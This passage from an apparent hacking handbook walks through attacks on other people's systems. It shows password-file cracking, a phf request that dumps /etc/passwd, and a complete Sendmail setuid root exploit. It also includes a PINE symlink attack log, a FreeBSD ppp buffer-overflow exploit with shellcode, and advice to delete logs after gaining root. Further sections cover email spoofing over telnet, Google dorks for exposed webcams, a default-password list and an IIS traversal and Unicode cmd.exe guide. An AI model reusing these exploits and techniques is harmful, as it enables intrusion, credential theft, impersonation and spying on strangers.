root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file.

root:x:0:1:Superuser:/: ftp:x:202:102:Anonymous ftp:/u1/ftp: ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little difference, it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker(both explained later in the text). Below is another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: Mail:mtahirzahid@yahoo.com

Page 322


Power Of Hacking速 adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password or sometimes they are disguised as an * as well.

Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although the files vary from system to system. 1.The first step that you would take is to download or copy the file. 2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there

Mail:mtahirzahid@yahoo.com

Page 323


Power Of Hacking速 are a few ok ones out there. I recomend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) . We will be releasing our pasword file to the public soon, it will be called, Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives you.

The PHF Technique

Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it.

The phf technique is by far the easiest way of getting a password file(although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Mail:mtahirzahid@yahoo.com

Page 324


Power Of Hacking® You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file(if it works).

Telnet and Exploits

Well exploits are the best way of hacking webpages but they are also more complicated then hacking through ftp or using the phf. Before you can setup an exploit you must first have a telnet proggie, there are many different clients you can just do a netsearch and find everything you need. It’s best to get an account with your target(if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each seperately. I’m going to list a few below but the list of exploits is endless.

This exploit is known as Sendmail v.8.8.4 It creates a suid program /tmp/x that calls shell as root. This is how you set it up:

cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" Mail:mtahirzahid@yahoo.com

Page 325


Power Of Hacking速 #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c Mail:mtahirzahid@yahoo.com

Page 326


Power Of Hacking® # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi

and now on to another exploit. I’m going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile.

Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.

This was writen by Sean B. Hamor…For this example, hamors is the victim while catluvr is the attacker:

Mail:mtahirzahid@yahoo.com

Page 327


Power Of Hacking速 hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 ++

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 Mail:mtahirzahid@yahoo.com

Page 328


Power Of HackingÂŽ

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

now on to another one, this will be the last one that I’m going to show. Exploitation script for the ppp vulnerbility as described by no one to date, this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesnt work. This is how you set it up: v #include #include #include

#define BUFFER_SIZE 156 /* size of the bufer to overflow */

#define OFFSET -290 /* number of bytes to jump after the start of the buffer */

long get_esp(void) { __asm__("movl %esp,%eax\n"); }

main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] =

Mail:mtahirzahid@yahoo.com

Page 329


Power Of Hacking速 "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ int i,j;

buf = malloc(4096);

/* fill start of bufer with nops */

i = BUFFER_SIZE-strlen(execshell);

memset(buf, 0x90, i); ptr = buf + i;

/* place exploit code into the buffer */

for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i];

addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; Mail:mtahirzahid@yahoo.com

Page 330


Power Of Hacking®

ptr = (char *)addr_ptr; *ptr = 0;

setenv("HOME", buf, 1);

execl("/usr/sbin/ppp", "ppp", NULL); }

Now that you’ve gotten root "what’s next?" Well the choice is up to you but I would recommend changing the password before you delete or change anything. To change their password all you have to do is login via telnet and login with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while you can now upload you pages, delete all the logs and just plain do your worst things. Fastest way to hack into someone's computer Well as i already mentioned u can hack any system as it is connected to what we call INTERNET . To connect Internet a system allocates a port for communication and Data Transfer. SO here it goes all we got to do is get into that port that's hacking. Read more to see the full steps.. steps: 1.Download software PORT SCANNER. Also you scud use port scanner from Nettools..Download link on my blog.. 2.Copy the ip address of the victim whose port is open. 3.Download NETLAB which gives u all information includes victim ip address,Area from where he is accessing Internet.... 4.Paste the ip of victim u found initially into NETLAB .That's it u access his system.

Mail:mtahirzahid@yahoo.com

Page 331


Power Of Hacking速 Click here to download NETLAB Use telnet to send email for anyone's email to anyone Send anonymous email from anyone to anyone. You hear it right from any email ID to any email ID. You can send any email to your friend from their email ID. Or you might even send someone an email from Steve Jobs's email. Here is the simple hack that let's you do just that using the most common feature available in all computers. Just follow the simple procedure. And so comment for any help. 1 Open the cmd prompt. (Start -> Run or press win key + R, then type cmd and presss OK )

2 Type telnet server.com 25 (where "server.com" is the name of the smtp (outgoing) server of your email provider, such as smtp-server.austin.rr.com). This can be found by checking your account info in the program you normally use for email.

3 Type HELO server.com. (Or "EHLO server.com")

4Type MAIL FROM:you@server.com.

5You may get a message saying "250 ok"

6Type RCPT TO:Friend1@anotherserver.com, friend_two@someotherserver.org, friend.3three@Someserver.com, etc.

7 again, You may get a message saying "250 ok"

8 To write the message, type DATA and press Enter. 1. On the first line type SUBJECT:yoursubject and press Enter twice. 2. Continue typing your message. 3. Put a single period (.) on a line by itself and press Enter to send your message. The server should say 'Message accepted for delivery'. (Or it says 250 OK id=`a long id`)

Mail:mtahirzahid@yahoo.com

Page 332


Power Of Hacking® 9Type QUIT to exit Telnet. This will not work if your ISP uses dynamic IP to give you internet access. If you could try using some botnet server that is quite easy. If you would request would post a tutorial for that as well. Well use the hack at your own risk as you can easily be traced back, as each email also sends your IP. You might use some IP re-routing software like anonymizer. But still use it cautiously. And this post was only for educational purpose. (Internet WebCam) Without Software You know you can hack web camera? Even if you‟re not a hacker, you can easily hack an internet webcam. You might wonder you will need some huge and complex softwares, some coding skills… or something like that? No! But “hacking” without any coding skills? Seriously? Psst. Okay, it‟s not a “HACK” – it‟s just a trick. But it‟s awesome, really!All you need is access to Google Search and java plugin to view video (that‟s already installed in every browser, mostly). So, lets move ahead. First go to Google search website (www.google.com) and then in the search box type: “inurl:/view/index.shtml” (without quotes) Then, press enter. (Noob tip: Copy and paste the text, instead of typing it again) Google will then show the list of cameras working on net. That‟s it! Trick over. Note: If u type the IP address of the computer in place of inurl then the web camera of that computer can be hacked. Did I just say “hacked”? Indeed, I did. But It‟s wasn‟t supposed to be a “hack” at all, you said… Actually… *read on* Example: Here is an example of the search. Your query will look something like this: 207.111.165.30/view/index.shtml The above search query will show webcam used at that IP address. The other Google search links which makes web cameras publicly viewable are as follows: inurl:/view.shtml intitle:”Live View / – AXIS” | inurl:view/view.shtml^ inurl:ViewerFrame?Mode= Mail:mtahirzahid@yahoo.com

Page 333


Power Of Hacking® inurl:ViewerFrame?Mode=Refresh inurl:axis-cgi/jpg inurl:axis-cgi/mjpg (motion-JPEG) inurl:view/indexFrame.shtml inurl:view/index.shtml inurl:view/view.shtml liveapplet intitle:”live view” intitle:axis intitle:liveapplet allintitle:”Network Camera NetworkCamera” intitle:axis intitle:”video server” intitle:liveapplet inurl:LvAppl intitle:”EvoCam” inurl:”webcam.html” intitle:”Live NetSnap Cam-Server feed” intitle:”Live View / – AXIS” intitle:”Live View / – AXIS 206M” intitle:”Live View / – AXIS 206W” intitle:”Live View / – AXIS 210? inurl:indexFrame.shtml Axis inurl:”MultiCameraFrame?Mode=Motion” intitle:start inurl:cgistart intitle:”WJ-NT104 Main Page” intext:”MOBOTIX M1? intext:”Open Menu” intext:”MOBOTIX M10? intext:”Open Menu” intext:”MOBOTIX D10? intext:”Open Menu” intitle:snc-z20 inurl:home/ intitle:snc-cs3 inurl:home/ intitle:snc-rz30 inurl:home/ intitle:”sony network camera snc-p1? intitle:”sony network camera snc-m1? site:.viewnetcam.com -www.viewnetcam.com intitle:”Toshiba Network Camera” user login intitle:”netcam live image” intitle:”i-Catcher Console – Web Monitor” ptcl passwords major use 123456 abc/123 abc-123 uvwxyz abc.133 ptcl123 apc-123 Mail:mtahirzahid@yahoo.com

Page 334


Power Of Hacking速 ptclptcl abc-123 ptcl 0786 Computer Nul IIS EXPLAINATION:*************************************************************************** *

Guide to IIS Exploitation

*

by fugjostle

*

* *

*

V.1.0.1

* *

*

* *

Questions? Comments? Email: fugjostle at ch0wn.com

*

***************************************************************************

Disclaimer: I do not condone hacking IIS servers in any way, shape or form. This guide is intended as a guide for admins to help them understand what most script kiddies don't understand but are happy to exploit.

--[On the first day, God created directory traversal]

Mail:mtahirzahid@yahoo.com

Page 335


Power Of Hacking速 Relative paths are the developers friend. They allow an entire website to be moved to another directory without the need for changing all the links in the html. For example, lets say we have a webpage called 'pictures.html' in the htdocs dir:

Absolute path: /home/webpages/htdocs/pictures.html Absolute path: /home/webpages/images/pic1.gif

In the html you can refer to the 'pic1.gif' via an absolute path shown above or use a relative path:

Relative path: ../images/pic1.gif

The relative path tells the server that it has to go to the parent directory (dot dot) --> from /home/webpages/htdocs to /home/webpages. Then the server goes into the images dir and looks for the gif file to display.

Anyone who has used the 'cd' command in DOS and *nix should be familiar with the operation. So what's the problem I hear you ask... well, the programmers of web server didn't think to check the supplied URL to ensure that the requested file was actually in the web directory. This allows someone to backtrack through the servers directory structure and request files that the web server has access to. For example,

http://www.target.com/../../../etc/passwd Mail:mtahirzahid@yahoo.com

Page 336


Power Of Hacking速

NB. you can also use double dots and double quotes. This is useful to evade Intrusion Detection Systems (IDS):

http://www.target.com//....//....//...././etc/./passwd

The webserver simply strips the extra stuff out and processes the request. This is the same as the previous example and can make string matching IDS's work for their money.

--[On the second day, God created Hexadecimal]

Once programmers started to realise the mistake they began to create parser routines to check for naughty URL's and keep the requests within the document root. Then along comes a wiley hacker who wonders if by encoding the URL will it still be recognised by the parser routines.

You may have noticed that when you enter a URL that includes a space it is replaced with the hex equivalent (%20):

http://www.target.com/stuff/my index.html

becomes

Mail:mtahirzahid@yahoo.com

Page 337


Power Of Hacking速 http://www.target.com/stuff/my%20index.html

and voila, it works. So what would happen if we changed the now denied URL:

http://www.target.com/../../../etc/passwd

to

http://www.target.com/%2e%2e/%2e%2e/%2e%2e/etc/passwd

The parser routine checks for the existence of dots in the path and finds none... the webserver then proceeds with the request.

An interesting feature is that you can encode the hex symbol and the web server will decode it all for you. This is called the "double decode". For example, given the URL "http://victim.com/..%252f..%252fdocs/", the following will take place:

(1) On the first decode, the string will be converted to:

"http://victim.com/..%2f..%2fdocs/"

[%25 = '%' so '%252f' is decoded to '%2f']

(2) On the second decode, the string will be converted to: Mail:mtahirzahid@yahoo.com

Page 338


Power Of Hacking速

"http://victim.com/../../docs/"

[%2f = '/']

--[On the third day, God created Unicode]

The World Wide Web is a global phenomenon and as such needs to be globally interoperable. This raised the question of how to deal with all the different character sets around the world. As a response to this, Unicode was created:

----------------------------------------------------------------Unicode provides a unique number for every character, no matter what the platform, no matter what the program, no matter what the language. The Unicode Standard has been adopted by such industry leaders as Apple, HP, IBM, JustSystem, Microsoft, Oracle,SAP, Sun, Sybase, Unisys and many others. Unicode is required by modern standards such as XML, Java, ECMAScript (JavaScript), LDAP, CORBA 3.0, WML, etc., and is the official way to implement ISO/IEC 10646. It is supported in many operating systems, all modern browsers, and many other products. -----from http://www.unicode.org---------------------------------

Mail:mtahirzahid@yahoo.com

Page 339


Power Of Hacking速 The problem with Unicode is that it requires 16 bits for a single character and software tended to use 8 bits for a single character. Unicode TransForm using 8 bits (UTF-8) was created. This allows for multibyte encoding where a variable number of bytes can be used for each character:

Character 1-byte 2-byte 3-byte .

2E

C0 AE E0 80 AE

/

2F

C0 AF E0 80 AF

\

5C

C1 9C E0 81 9C

This lead to a new vulnerability in certain webservers. The parser didn't understand this new encoding and allowed it through :-)

For example:

www.target.com/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/ passwd

Recent vulnerabilities have been taking advantage of the fact that the web server doesn't understand the Unicode UTF-8 character set but the underlying OS does:

www.target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c%20dir

Understanding the distinction between Unicode and UTF-8 can be difficult. As Mail:mtahirzahid@yahoo.com

Page 340


Power Of Hacking速 a general rule of thumb you can use the following format as a guide:

%uxxxx

= Unicode

%xx%xx

= UTF-8

%xx %xxxx

= Hexidecimal = Double Decode

--[On the fourth day, God created default installs]

IIS comes installed with various DLL's (Dynamic Link Libraries) that increase the functionality of the web server. These ISAPI (Internet Server API) applications allow programmers/developers to deliver more functionality to IIS.

The DLL's are loaded into memory at startup and offer significant speed over traditional CGI programs. For example, they can be combined with the Internet Database Connector (httpodbc.dll) to create interactive sites that use ODBC to access databases.

The problem is that some of these DLL's are insecure and are often installed with sample scripts that demonstrate how to exploit, erm, I mean use them.

ASP.DLL is used to pre-process requests that end in ".asp". ASP (Active Server Pages) are basically HTML pages with embedded code that is processed by the webserver before serving it to the client. Mail:mtahirzahid@yahoo.com

Page 341


Power Of Hacking速

Here's some examples to illustrate how the sample pages installed by default can aid someone breaking into your site via the ASP.DLL: [prefix all the examples with http://www.target.com]

/default.asp.

** Appending a '.' to the URL can reveal the source ** on older systems. Remember hex encoding? You can ** also try using %2e to do the same thing.

/msadc/samples/adctest.asp

** This gives you an interface into the msadcs.dll ** and allows creation of DSN's. Read RFP's stuff ** for idea's on how to exploit this.

/iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../.../../../../boot.ini /msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../.../boot.ini

** You can view the source of anything in the ** document root. '/msadc/' needs to be in the ** request as it is checked for, wait for this, ** security :-)

Mail:mtahirzahid@yahoo.com

Page 342


Power Of Hacking速 /index.asp::$DATA

** Appending '::$DATA' to the URL can reveal ** the source of the ASP.

/index.asp%81

** Append a hex value between 0x81 and 0xfe ** and you can reveal the source of any server ** processed file. This only works on servers ** that are Chinese, Japanese or Korean.

/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:\")|

** This one allows you to execute remote ** shell commands ;-)

ISM.DLL is used to process requests that end in ".htr". These pages were used to administer IIS3 servers. In IIS4 they are not used but various .htr samples are installed by default anyway and offer another avenue for entry.

/index.asp%20%20%20..(220 more)..%20%20.htr

** IIS will redirect this request to ISM.DLL, ** which will strip the '.htr' extension and Mail:mtahirzahid@yahoo.com

Page 343


Power Of Hacking速 ** deliver the source code of the file.

/global.asa+.htr

** Does the same thing as the %20%20 exploit ** above. ISM.DLL strips the +.htr and delivers ** you the source of the file

/scripts/iisadmin/ism.dll?http/dir

** Excellent brute force opportunity if the ** dll exists. Successful logons will reveal ** lots of useful stuff.

/iisadmpwd/aexp.htr

** The iisadmpwd diectory contains several .htr ** files that allow NetBIOS resolution and ** password attacks.

/scripts/iisadmin/bdir.htr??c:\inetpub\www

** This method will only reveal directories ** but can be useful for identifying the ** servers structure for more advanced Mail:mtahirzahid@yahoo.com

Page 344


Power Of Hacking速 ** attacks later.

MSADCS.DLL is used to allow access to ODBC components via IIS using RDS (Remote Data Service). RDS is part of the default install of Microsoft Data Access Components (MDAC) and is a commonly exploited on IIS. It can allow arbitrary shell commands to be executed with system privileges.

/msadc/msadcs.dll

** If this file exists then there's a pretty ** good chance that you can run the RDS ** exploit again the box. More on this later.

HTTPODBC.DLL is the Internet Connector Database (IDC) and used when the web server wants to connect to a database. It allows the creation of web pages from data in the database, and it allows you to update/delete items from within webpages. Pages with the extension '.idc' are sent to the HTTPODBC.DLL for processing.

/index.idc::$DATA

** Appending '::$DATA' to the URL can reveal ** the source of the IDC.

/anything.idc Mail:mtahirzahid@yahoo.com

Page 345


Power Of Hacking速

** Requesting a non-existance file will ** reveal the location of the web root.

/scripts/iisadmin/tools/ctss.idc

** Creates a table based on the parameters it ** receives. Excellent place to look at for ** SQL injection.

SSINC.DLL is used for processing Server Side Includes (SSI). '.stm', '.shtm' and '.shtml' extension are sent to the DLL which interprets the SSI statements within the HTML before sending it to the client.

An example of SSI would be:

<!--#include file="news.txt"-->

This SSI tells the server to include the 'news.txt' in the final HTML sent to the use. SSI statements are beyond the scope of this document but offer another security hole open to our wiley hax0r. Ensure you remove the app mapping and disable SSI if you do not require its functionality.

SSINC.DLL is also vulnerable to a remote buffer overflow, read the Mail:mtahirzahid@yahoo.com

Page 346


Power Of Hacking速 following advisory for details:

http://www.nsfocus.com/english/homepage/sa01-06.htm

Some examples of SSINC.DLL fun:

/anything.stm

** If you request a file that doesn't exist ** then the server error message contains the ** the location of the web root.

/somedir/anything.stm/somedir/index.asp

** Using this method allows you to view the ** the source code for index.asp.

IDQ.DLL is a component of MS Index Server and handles '.ida' and '.idq' requests. This DLL has had some big exposure with the recent Nimda worm. I'm not going into too much detail but '.ida' was used in a buffer overflow that resulted in user defined code being executed on the server.

/anything.ida or /anything.idq

** Requesting a non-existance file will Mail:mtahirzahid@yahoo.com

Page 347


Power Of Hacking速 ** reveal the location of the web root.

/query.idq?CiTemplate=../../../boot.ini

** You can use this to read any file on ** the same drive as the web root

CPSHOST.DLL is the Microsoft Posting Acceptor. This allows uploads to your IIS server, via a web browser or the Web Publishing Wizard. The existance of this DLL can allow attackers upload files to the server. Other files such as uploadn.asp, uploadx.asp, upload.asp and repost.asp are installed with Site Server and allow upload of documents to the server:

/scripts/cpshost.dll?PUBLISH?/scripts/dodgy.asp

** If this file is there then you may be able ** to upload files to the server.

/scripts/uploadn.asp

** Connecting to this page gives you a nice ** gui for uploading your own webpages. You ** probably need to brute the userid.

There are lots more example scripts in the default install and quite a few Mail:mtahirzahid@yahoo.com

Page 348


Power Of Hacking速 of them are very, very insecure. Microsoft recommends that you remove ALL samples from any production server including the ExAir, WSH, ADO and other installed samples.

IIS Default Web Site -------------------IISSAMPLES - c:\inetpub\iissamples IISADMIN - c:\winnt\system32\inetsrv\issadmin IISHELP

- c:\winnt\help

SCRIPTS

- c:\inetpub\scripts

IISADMPWD - c:\winnt\systems32\inetsrv\iisadmpwd msadc logfiles

- c:\program files\common files\system\msadc - c:\winnt\system32\logfiles

default.htm - c:\inetpub\wwwroot

IIS Default App Mapping ----------------------.asa - c:\winnt\system32\inetsrv\asp.dll .asp - c:\winnt\system32\inetsrv\asp.dll .cdx - c:\winnt\system32\inetsrv\asp.dll .cer - c:\winnt\system32\inetsrv\asp.dll .htr - c:\winnt\system32\inetsrv\ism.dll .idc - c:\winnt\system32\inetsrv\httpodbc.dll .shtm - c:\winnt\system32\inetsrv\ssinc.dll .shtml - c:\winnt\system32\inetsrv\ssinc.dll Mail:mtahirzahid@yahoo.com

Page 349


Power Of Hacking速 .stm - c:\winnt\system32\inetsrv\ssinc.dll

--[On the fifth day, God created Frontpage Extensions]

Microsoft Frontpage (Originally developed by Vermeer Tech Inc, if you've ever wondered why they use _vti_) is a web design tool that helps you create and maintain a web site and allows you to publish it to the web server.

In order to publish using Frontpage the server needs to run certain programs, collectively called the Frontpage Server Extensions.

Sounds good I hear you say, but there are many, many security holes in Frontpage. You can list all the files, download password files and upload your own files on Frontpage enabled sites.

When you publish a file, Frontpage attempts to read the following URL to get all the information it needs to publish:

http://www.myserver.com/_vti_inf.html

Then Frontpage uses the following URL to POST the files to the site:

http://www.myserver.com/_vti_bin/shtml.exe/_vti_rpc Mail:mtahirzahid@yahoo.com

Page 350


Power Of Hacking速

It will come as no surprise that this file is not protected and open to abuse.

All information for the site is stored in the /_vti_pvt/ dir, and its world readable. Here's some of the things you can look for:

http://www.myserver.com/_vti_pvt/administrators.pwd http://www.myserver.com/_vti_pvt/authors.pwd http://www.myserver.com/_vti_pvt/service.pwd http://www.myserver.com/_vti_pvt/shtml.dll http://www.myserver.com/_vti_pvt/shtml.exe http://www.myserver.com/_vti_pvt/users.pwd http://www.myserver.com/_private

--[On the sixth day, God created CGI]--

The Common Gateway Interface (CGI) is a standard for interfacing external applications to the web server. A CGI program is excuted in real time and is used to create dynamic web sites.

Generally, the CGI programs are kept in '/cgi-bin/' but can be placed anywhere. The programs can be written most languages but typically they are written in C, Perl or shell scripts. Mail:mtahirzahid@yahoo.com

Page 351


Power Of Hacking速

Many sites will use freely available, downloadable scripts from places like Matt's Trojan, erm, I mean Matt's Script Archive. Its always a good idea to look through the source of the scripts for bad system calls and lax input validation.

CGI deserves a tutorial all to itself and I strongly suggest that you read the following tutorials... they explain it better than I ever could:

Hacking CGI

- http://shells.cyberarmy.com/~johnr/docs/cgi/cgi.txt

Perl CGI Problems - http://www.phrack.com/phrack/55/P55-07

Just to get you in the mood we will have a brief look at CGI exploitation. There are three main types of CGI hacking; URL encoding attacks, input validation exploits and buffer overflows.

The first thing to keep in mind is that you are already able to exploit cgi using the techniques from previous sections. First, we need to cover some background. CGI can take lots of shapes and forms. One popular use is via web based forms that submit information to a CGI via a GET or POST.

<FORM NAME="myform" "METHOD=GET" ACTION="../cgi-bin/my_cgi.cgi">

When the user clicks on the submit button his information is passed to the CGI script to process either via the URL (GET) or via HTTP headers (POST). Mail:mtahirzahid@yahoo.com

Page 352


Power Of Hacking速 Lets assume that the CGI we are going to exploit asks the user for the name of a file to display. The 'GET' method uses the URL to pass the information and it would look like this:

http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd

Lets break that down:

?

- separates the request from the parameters

filename =

- this is the name of the textbox in the html

- assignment for the parameter/value pair

/etc/passwd - this is what the user typed into the box

You can have multiple fields within a HTML form and these will also be passed to the CGI. They are separated using a '&':

http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd&user=fugjostle

If you were thinking how could you alter the user supplied input to break the CGI then good, you're starting to think in terms of security. Lots of developers love to program new and interesting things but they do not consider security. A security conscious programmer would write input validation routines that would process the data and ensure the user wasn't be malicious or curious.

Mail:mtahirzahid@yahoo.com

Page 353


Power Of Hacking速 As you read through some of the free scripts on the web you will start to realise that many programmers do not think about security. Lets look briefly at some ways we could exploit the CGI. The first thing to keep in mind is that you already know the generic exploits from the previous section. The only area in which we are lacking is programming language specific info.

We will stick with the example cgi that open's a file (and let's assume its written Perl). Lets look at some of the things we can try:

my_cgi.pl?filename=../../../../../etc/passwd

and lets do the same thing but encode the URL to bypass security checks:

my_cgi.pl?filename=../..%c0%af../..%c0%af../etc/passwd

If you have read the RFP document above then you will be familiar with poison null bytes. Stop now and go read it... can't be arsed? ok then, here's the quick version. %00 is valid in a string with Perl but is NUL in C. So? When Perl wants to open the file it makes a request to the operating system through a system call. The operating system is written in C and %00 is a string delimiter. Lets apply this technique to the following situation.

I decide to secure my CGI. I append '.html' to any request. This means that the user can only view html files and if they try something else then it Mail:mtahirzahid@yahoo.com

Page 354


Power Of Hacking速 doesn't exist. wh00p @ me :-)

But... what if I was to do the following:

my_cgi.pl?filename=../../../../etc/passwd%00

In Perl the filename string would look like this:

"../../../../etc/passwd\0.html"

Perfectly valid under Perl. I have done my job... or have I? When this is passed to the OS (which is written in C not Perl) the request looks like this:

"../../../../etc/passwd"

The OS identifies %00 as the string delimiter and ignores anything that Comes after it. The webserver then displays the /etc/passwd file... bugger :-(

Many people download scripts from the web and look for problems in the script. Then the wiley hax0r will go to altavista and search for sites that are using that script, eg:

url:pollit.cgi

Mail:mtahirzahid@yahoo.com

Page 355


Power Of Hacking速 and good old altavista provides a list of sites that are just ripe for the taking.

The final method of exploiting CGI is via buffer overflows. Languages like Java and Perl are immune to buffer overflows because the language looks after memory management. Programs written in a language such as C are vulnerable because the programmer is supposed to manage the memory. Some programmers fail to check the size of data it is fitting into the memory buffer and overwrites data in the stack.

The goal of the buffer overflow is to overwrite the instruction pointer which points to the location of the next bit of code to run. An attacker will attempt to overwrite this pointer with a new pointer that points to attacker's code, usually a root shell.

Quite a few CGI's exist that are vulnerable to this type of attack. For Example, counter.exe is one such CGI. By writing 2000 A's to the CGI cause a Denial of Service (DoS).

The details of buffer overflows are beyond the scope of this document. Look out for a future release ;-)

If you want to dig deeper in buffer overflows then have a look at:

http://www.phrack.com/phrack/49/P49-14 Mail:mtahirzahid@yahoo.com

Page 356


Power Of Hacking速

--[On the seventh day, God chilled and haxored the planet]

Well.. I guess its time we actually tried some of the things discussed but I'm not going to cover everything. I suggest going to the following URL's and searching for IIS:

http://www.securityfocus.com/ http://www.packetstormsecurity.com/

My main reason for doing this file was to better understand Unicode exploits and so that is going to be the focus of the exploitation. The first exploit I'm going to go through is the recent Unicode exploit for IIS4/5:

http://www.securityfocus.com/bid/1806

Before I get emails saying 'hold on, you said that %xx%xx is UTF-8" let me explain. This had wide exposure on Bugtraq as the Unicode exploit. In reality, this is not a Unicode sploit but a UTF-8 sploit. I'm going to keep calling this the Unicode exploit because its now referenced by this name in the Bugtraq archives and you'll have to search using Unicode to do further research.

Ok, rant over... To check if the server is exploitable, request the Mail:mtahirzahid@yahoo.com

Page 357


Power Of Hacking速 following URL:

http://target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

You should get a directory listing of the C:\ drive on the target server. The important thing to note is that the Unicode string can vary depending where in the world you are. Some possible alternatives include:

%c1%1c %c0%9v %c0%af %c0%qf %c1%8s %c1%9c %c1%pc

There are many more to choose from, just look at some of the Bugtraq posts or research UTF-8 for more alternatives.

